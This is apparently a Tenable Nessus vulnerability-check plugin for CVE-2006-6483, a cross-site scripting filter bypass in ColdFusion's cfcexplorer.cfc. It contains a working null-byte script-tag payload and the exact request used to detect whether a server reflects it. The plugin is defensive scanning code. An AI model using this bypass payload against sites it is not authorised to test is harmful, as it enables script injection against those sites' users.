#
# (C) Tenable Network Security
#


if (description)
{
  script_id(24279);
  script_version("$Revision: 1.3 $");

  script_cve_id("CVE-2006-6483");
  script_bugtraq_id(21532);

  script_name(english:"ColdFusion Cross-Site Scripting Protection Bypass Vulnerability");
  script_summary(english:"Checks for an XSS flaw in ColdFusion");

  desc = "
Synopsis :

The remote web server is vulnerable to a cross-site scripting attack. 

Description :

The remote web server contains a script that fails to completely
sanitize user input before using it to generate dynamic content.  An
unauthenticated remote attacker may be able to leverage this issue to
inject arbitrary HTML or script code into a user's browser to be
executed within the security context of the affected site. 

See also :

http://archives.neohapsis.com/archives/fulldisclosure/2006-12/0203.html
http://www.adobe.com/support/security/bulletins/apsb07-06.html

Solution :

Update to ColdFusion MX 7.0.2 if necessary and apply the hotfix
referenced in the vendor advisory above. 

Risk factor :

Low / CVSS Base Score : 2.6
(CVSS2#AV:N/AC:H/Au:N/C:N/I:P/A:N)";
  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses : XSS");

  script_copyright(english:"This script is Copyright (C) 2007 Tenable Network Security");

  script_dependencies("http_version.nasl", "cross_site_scripting.nasl");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("http_func.inc");
include("http_keepalive.inc");
include("url_func.inc");


port = get_kb_item("Services/www");
if (!port) port = 80;
if (!get_port_state(port)) exit(0);
if (get_kb_item("www/"+port+"/generic_xss")) exit(0);


# Make sure it's ColdFusion.
res = http_get_cache(item:"/CFIDE/administrator/index.cfm", port:port);
if (res == NULL) exit(0);
if ("ColdFusion Administrator Login" >!< res) exit(0);


# Send a request to exploit the flaw.
xss = raw_string("<", 0, "script>alert(", SCRIPT_NAME, ")</script>");
req = http_get(
  item:string(
    '/CFIDE/componentutils/cfcexplorer.cfc?',
    'method=getcfcinhtmtestl&',
    'name=CFIDE.adminapi.administrator&',
    'path=/cfide/adminapi/administrator.cfctest">', urlencode(str:xss)
  ), 
  port:port
);
res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
if (res == NULL) exit(0);


# There's a problem if our exploit appears in 'faultactor' as-is.
if (egrep(pattern:string('form name="loginform" action=".+', xss, '.+ method="POST"'), string:res))
  security_note(port);
